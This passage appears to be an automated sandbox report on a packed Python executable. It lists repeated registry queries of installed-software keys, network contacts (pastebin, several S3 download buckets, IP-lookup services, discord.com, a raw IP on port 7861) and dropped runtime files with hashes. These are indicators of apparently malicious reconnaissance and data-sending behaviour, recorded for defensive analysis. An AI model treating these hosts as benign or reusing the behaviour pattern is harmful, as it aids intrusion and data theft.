C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
JP 52.219.199.65:80 prod-be-source.s3.amazonaws.com tcp
US 8.8.8.8:53 65.199.219.52.in-addr.arpa udp
US 16.182.40.209:443 rocdownloads.s3.amazonaws.com tcp
US 3.5.25.249:443 ccfs-download.s3.amazonaws.com tcp
SG 52.219.124.24:443 hiddendownload.s3.amazonaws.com tcp
US 52.217.135.105:443 kims-downloads.s3.amazonaws.com tcp
US 3.5.25.249:443 ccfs-download.s3.amazonaws.com tcp
US 52.218.183.145:443 imageuploaddownload.s3.amazonaws.com tcp
US 3.5.25.249:443 ccfs-download.s3.amazonaws.com tcp
CA 16.12.5.108:443 myfreegiftdownloads.s3.amazonaws.com tcp
US 52.219.177.76:443 mocs-downloads.s3.amazonaws.com tcp
IN 52.219.156.67:443 image-downloader.s3.amazonaws.com tcp
CA 16.12.5.108:443 myfreegiftdownloads.s3.amazonaws.com tcp
SE 3.5.217.61:443 downloadwp.s3.amazonaws.com tcp
AU 52.95.131.181:443 ssrdownload.s3.amazonaws.com tcp
BR 52.95.163.125:443 downloadmontreal.s3.amazonaws.com tcp
IE 52.218.93.138:443 dctdownload.s3.amazonaws.com tcp
US 52.92.251.137:443 flidownload.s3.amazonaws.com tcp
US 52.92.251.137:443 flidownload.s3.amazonaws.com tcp
US 52.92.251.137:443 flidownload.s3.amazonaws.com tcp
US 172.67.74.152:443 api.ipify.org tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
JP 52.219.162.153:80 prod-be-source.s3.amazonaws.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 64.188.16.134:7861 tcp
SG 54.255.23.154:443 api.manager.pingpong.build tcp
US 64.188.16.134:7861 tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI10682\ucrtbase.dll

MD5 f7409ff2f0ea3a7b6a18709d4fda563a
SHA1 902eea6263811f6866d2a1df4d3bd7686083d221
SHA256 a56ee0ddc5120538cd7cb2073657b3a0d95cfa202712b2079a5a8d5052594b2a
SHA512 e600160c11e17c69d0fca8999290bd84d8afe748f77fe91c708a7136c976bb85cd16f60905fccb045c7ead7032af3778feb6ed21b687a82f4a7da698333dfa4a

C:\Users\Admin\AppData\Local\Temp\_MEI10682\python310.dll

MD5 54f8267c6c116d7240f8e8cd3b241cd9
SHA1 907b965b6ce502dad59cde70e486eb28c5517b42
SHA256 c30589187be320bc8e65177aeb8dc1d39957f7b7dcda4c13524dd7f436fb0948
SHA512 f6c865c8276fe1a1a0f3267b89fb6745a3fc82972032280dce8869006feb2b168516e017241a0c82bdae0f321fab388523691769f09a502fc3bd530c1c4cacf1

C:\Users\Admin\AppData\Local\Temp\_MEI10682\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\_MEI10682\base_library.zip

MD5 fbcb6d01ad2e2c8021b1c88542174278
SHA1 8fed793694c18e2cd34d8cc7f6f1198b8783ff58
SHA256 6a0cd90db0548408dcda8f0f59aa0cc6a87a4dc1159dcf8b3d750ef0f4c5dfe1
SHA512 4aba2913d24ea5d6c12c648b85d15ceb59d58c4de93bd4ef86bf7f85b2b25d27b36cd4c99109857418287ab419ee1fdc4849b092ff068604539a79554b696f62

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_ctypes.pyd

MD5 2abeebe2166921a4d8b67b8f8a2b878a
SHA1 21f0fff00cba76a0ea471c3e05179e4b4cc1ebd0
SHA256 7adcea3a5568752a6050610cfbe791a4f8186aaaa002f916b88560a1ddab580f
SHA512 54c802d532c9ef9f3668d5e9bf23b69a58f87ec545af7fd4eab1055bfb8ee66481f361458076a364a17ddddd6550a70f5442c2bbe6562553472c0839346b1a35

C:\Users\Admin\AppData\Local\Temp\_MEI10682\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_ssl.pyd

MD5 dcb25c920292192dd89821526c09a806
SHA1 79c9af3a11b41d94728f274b45a7c61dc8bbf267
SHA256 4e496cb3b89550cf5883d0b52f5f4660524969c7a5fa35a3b233df4f482d0482
SHA512 ae4ed1a66eef0b0c474c6ee498cd1388ef41f3746905257c7f5c0f73abbe3262eb47bb5748d47d55f1bd376308335a089c2b4c15ffe5d7fc21f2a660a4a93ba4

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_socket.pyd

MD5 4ceb5b09b8e7dc208c45c6ac11f13335
SHA1 4dde8f5aa30bd86f17a04e09a792a769feb12010
SHA256 71f014c3c56661ec93500db1d9f120e11725a8aedabc3a395658275710065178
SHA512 858c271b32729762773562ab3dbda8021aa775ba4606f57e891be18d9fe27518a48db0811eff9aafe53fb44557186431c672bbec204fa17a8ae6b86765a02d07

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_queue.pyd

MD5 8eabd51d536276f3b3257ee975e50bfc
SHA1 1a13f707b29b895647a7de254031a6c80eb2cb7a
SHA256 24c23d04d274a4c1234f1a1a35b1805e1f17f99968f8baeec0c3b5295f05608a
SHA512 cfa027a1e01204078ccab3c2e1910e5806e0294d3ff0225d4713ea3b16cf07589005a0cc342688c3bb0bb6aa31b5401760c3890d46b39038b046072ad7b02b81

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_lzma.pyd

MD5 401eca12e2beb9c2fbf4a0d871c1c500
SHA1 7cfc2f94ade6712dd993186041e54917a3dd15ae
SHA256 5361824ddac7c84811b80834eca3acb5fe6d63bf506cf92baf5bd6c3786bf209
SHA512 da6b63ba4e2e7886701ff2462c11dd989d8a3f2a2a64bb4f5eed7271b017d69e6cfe7347e3d515fdf615ec81d2bb58367bcc1533b8a5073edf9474a3759f6d7c

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_hashlib.pyd

MD5 477dd76dbb15bad8d77b978ea336f014
SHA1 3ee56105b71c3676c2e4fdaeb7d561f68cf03b9e
SHA256 23063b56aa067c3d4a79a873d4db113f6396f3e1fe0af4b12d95d240c4cf9969
SHA512 3a97c0a860e3cf97ae53b1f75623c52dcad9b64b70d329511781058a3477bc9faea32c2b8dc4852e7a8c4b0a02c8e3d027cf27e91187069cb35fb4d78d4e73ef

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_decimal.pyd

MD5 b6acb44c2f580991df7b1358a0fc0b69
SHA1 f2d3d2ce5439197637b02e8dd414f8e6dddb6678
SHA256 2bab2833c24eb4e07fe082d291013eed000a5cfc22df49311c729e7a57fe632e
SHA512 0e73b00db220794aa291b4e710ad7abbfb06a78fa63e1f313963472009f77a48d2ef9bca24d350bc2c94d2a14d3b676e9132ab79b33da5b09a3b90cceeb816b0

C:\Users\Admin\AppData\Local\Temp\_MEI10682\_bz2.pyd

MD5 23dce6cd4be213f8374bf52e67a15c91
SHA1 dfc1139d702475904326cb60699fec09de645009
SHA256 190ade9f09be287fcc5328a6a497921f164c5c67e6d4fcdcb8b8fd6853b06fe2
SHA512 c3983e2af9333a8538f68f7048b83c1bb32219c13adac26fd1036c3dc54394a3e2c1e4c0219232badd8e2c95418019b9b22906bdb23a19601447573a93c038a0

C:\Users\Admin\AppData\Local\Temp\_MEI10682\unicodedata.pyd

MD5 cf1eda3f804dfa64ac00cad29ab243e1
SHA1 3b0f08fa679227fa635490725e17460a9de8092d
SHA256 a3aa957cf891a411a4e22e41aa4053265eccba4d47b5abe6475789ebba7fcca0
SHA512 1ba213a7e5916fe628d80efdeade35de7db88cc8118f8ac348dc7f7a7c5977975c9cf63d774136259fc055790eb96644bde2ee19c044126f1d59d665e4bc8d97

C:\Users\Admin\AppData\Local\Temp\_MEI10682\select.pyd

MD5 a7863648b3839bfe2d5f7c450b108545
SHA1 10078d8edb2c46a2e74ec7680d2db293acc5731c
SHA256 8b4b5d37b829ba885281134d9948f249e0ecd553ae72deda6a404619fdf4ccc5
SHA512 a709865709abe0c39d68e2ced4aa4387cd173ea9aa0a04c9794733b5bf3584d50256a9f756fee1dec144a9d724b028264763196eeb7b89ab2697ff26d83db843

C:\Users\Admin\AppData\Local\Temp\_MEI10682\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

C:\Users\Admin\AppData\Local\Temp\_MEI10682\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI10682\api-ms-win-crt-utility-l1-1-0.dll

MD5 cd25aaba4bc9b1e7a8bdb6738fa754e3
SHA1 5b3b7ab86e42c29ead66455364a003c1d0b82780
SHA256 84a54902f25b6e7f63b593d93b07c86a542d359dc9051d8f2fdcd48e2ff43b0d
